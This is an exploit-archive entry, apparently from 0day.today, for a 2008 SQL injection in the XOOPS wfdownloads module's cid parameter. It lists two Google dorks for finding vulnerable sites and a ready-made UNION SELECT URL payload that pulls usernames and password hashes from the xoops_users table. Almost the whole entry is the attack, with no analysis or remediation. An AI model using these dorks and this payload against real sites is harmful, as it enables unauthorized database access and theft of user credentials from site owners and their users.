id: 2716
date: 03/06/2008
title: XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=================================================================
XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability
=================================================================



###############################################################
#
###########XOOPS module wfdownloads SQL Injection
#
################################################################
#
##DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid"
#
##DORK 2 : allinurl: "modules/wfdownloads"
#
################################################################
EXPLOIT :

modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass

################################################################



#  0day.today [2023-03-21]  #